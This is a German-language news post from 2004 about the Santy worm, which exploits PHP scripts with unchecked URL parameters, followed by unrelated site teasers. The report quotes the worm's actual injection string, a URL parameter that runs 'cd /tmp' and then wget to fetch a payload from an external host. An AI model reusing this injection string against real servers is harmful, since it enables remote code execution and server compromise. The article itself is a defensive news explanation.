Wurm attackiert PHP-Skripte
Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700
2004-12-26 00:00:00 2004-12-26 00:00:00 admin
Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:
http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;
Ãberprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.
hiese.de
Erfahrungen
Hier Kannst Du einen Kommentar verfassen
Verwandte Beiträge
Das bekannte und beliebte MySQL Tool „mySQL Front“ steht vor dem aus.
Als einen der Hauptgründe führt der Autor den Rechtsstreit zwischen MySQL AB und dem Betreiber an. MySQL AB sieht eine Verletzung seiner Marke „MySQL“. Der Begriff taucht im Namen des Produktes sowie der Projekt-URL auf. Ein Versuche den Streit un ...
Autor :
admin
Kategorie:
Software & Web-Development
Maguma OpenStudio wird am 07 März 2005 der Open Source Gemeinschaft freigegeben
Die Maguma GmbH veröffentlicht ihre Open Source PHP Entwicklungsumgebung Maguma OpenStudio am 7. März 2005, 3 Tage vor Beginn der CEBIT. Maguma OpenStudio wird unter der Mozilla Public License (MPL) 1.1 veröffentlicht. Maguma Studio besteht weiterhin al ...
Autor :
admin
Kategorie:
Software & Web-Development
OpenSource Application-Server Zope 2.4 veröffentlicht
Die Firma Digital Creations ändert ihren Namen entsprechend ihrem Hauptprodukt und heißt jetzt Zope Corporation. Zeitgleich veröffentlichte man mit Zope 2.4 eine neue Version des OpenSource Application Servers. Die neue Version soll vor allem die Entwickl ...
Autor :
admin
Kategorie:
Software & Web-Development
T-online ändert Tarifemodell - T-online Flat wurde abgeschafft
Mit einem komplett neuem Tarifmodell sorg T-Online für Wirbel in sämtlichen Online-Communitys. Hauptmerkmal ist die Abschaffung der T-online Flat (nur für ISDN, T-DSL flat bleibt bestehen), sowie ne Menge neuer Tarife wie " T-Online by night " wo man zwis ...
Autor :
admin
Kategorie:
Software & Web-Development
“Spiegel TV - Pfusch am Bau” sucht …
Die Macher der Fernsehsendung “Spiegel TV - Pfusch am Bau” haben uns gebeten diesen Aufruf an alle Kampa- und Hebel Haus Geschädigt zu starten. ...
Autor :
admin
Kategorie:
Dies und Das
PHP 4.1.0 Final letzte Nacht veröffentlicht
PHP 4.1.0 wurde letzte Nacht veröffentlicht! die aktuelle Version ist unter http://www.php.net/downloads.php zu beziehen. Welche erneuerungen es gibt ist unter http://news.php.net/article.php?group=php.dev&article=72994 zu lesen. ...
Autor :
admin
Kategorie:
Software & Web-Development